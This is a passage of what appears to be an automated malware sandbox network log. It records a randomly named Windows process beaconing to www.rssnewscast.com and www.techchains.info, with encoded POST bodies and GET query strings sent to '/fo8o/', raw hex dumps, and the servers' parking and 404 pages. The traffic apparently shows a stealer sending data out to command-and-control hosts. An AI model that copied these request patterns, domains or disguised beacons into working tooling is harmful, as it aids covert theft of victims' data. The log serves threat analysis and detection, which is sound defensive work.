Data Ascii: 7BpTBrLp=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
Nov 25, 2024 18:13:51.656143904 CET | 707               | IN        | HTTP/1.1 405 Not Allowed
date: Mon, 25 Nov 2024 17:13:51 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.4 | 49944       | 91.195.240.94  | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:13:52.920407057 CET | 802               | OUT       | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: 7BpTBrLp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
Nov 25, 2024 18:13:54.241307974 CET | 707               | IN        | HTTP/1.1 405 Not Allowed
date: Mon, 25 Nov 2024 17:13:54 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.4 | 49950       | 91.195.240.94  | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:13:55.572906017 CET | 10884             | OUT       | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10305
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: 7BpTBrLp= [TRUNCATED]
Nov 25, 2024 18:13:56.863779068 CET | 707               | IN        | HTTP/1.1 405 Not Allowed
date: Mon, 25 Nov 2024 17:13:56 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.4 | 49957       | 91.195.240.94  | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:13:58.228084087 CET | 507               | OUT       | GET /fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.rssnewscast.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:13:59.633307934 CET | 1236              | IN        | HTTP/1.1 200 OK
date: Mon, 25 Nov 2024 17:13:59 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_E2CmXdOitfIqV53eGn37q2CzqLTjQW4+k8M2S7e6ag9WuHQHNbq4G7XXxaxwvGhffwelcB0VSUoIg1kmxHqnow==
last-modified: Mon, 25 Nov 2024 17:13:59 GMT
x-cache-miss-from: parking-7ffff5845f-5wfp4
server: Parking/1.0
connection: close
Data Ascii: 5B40<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_E2CmXdOitfIqV53eGn37q2CzqLTjQW4+k8M2S7e6ag9WuHQHNbq4G7XXxaxwvGhffwelcB0VSUoIg1kmxHqnow==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informat
                                                                                  Nov 25, 2024 18:13:59.633409977 CET1236INData Raw: 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                                                  Data Ascii: ssage__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{
                                                                                  Nov 25, 2024 18:13:59.633469105 CET1236INData Raw: 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67
                                                                                  Data Ascii: s:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;borde
                                                                                  Nov 25, 2024 18:13:59.633481979 CET1236INData Raw: 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73
                                                                                  Data Ascii: transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked
                                                                                  Nov 25, 2024 18:13:59.753947020 CET1236INData Raw: 72 75 65 2c 22 6e 6f 46 6f 6c 6c 6f 77 22 3a 66 61 6c 73 65 2c 22 73 6c 73 68 22 3a 66 61 6c 73 65 2c 22 70 70 73 68 22 3a 74 72 75 65 2c 22 64 6e 68 6c 73 68 22 3a 74 72 75 65 2c 22 74 6f 53 65 6c 6c 55 72 6c 22 3a 22 22 2c 22 74 6f 53 65 6c 6c
                                                                                  Data Ascii: rue,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.rssnewscast.com/parking.php","searchParams":{"ses":"Y3JlPTE3MzI1NTQ4MzkmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc0NGIwNTc2NGY4ODYuNDMxM


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.4 | 49992 | 66.29.149.46 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:14.157547951 CET | 782 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                                                                  Nov 25, 2024 18:14:15.476638079 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:15 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.4 | 49998 | 66.29.149.46 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:16.812448025 CET | 802 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                                  Data Ascii: 7BpTBrLp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                                                                  Nov 25, 2024 18:14:18.107289076 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:17 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.4 | 50005 | 66.29.149.46 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:19.462949038 CET | 10884 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=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 [TRUNCATED]
                                                                                  Nov 25, 2024 18:14:20.787000895 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:20 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.4 | 50013 | 66.29.149.46 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:22.140304089 CET | 507 | OUT | GET /fo8o/?7BpTBrLp=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.techchains.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:14:23.456640005 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:23 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
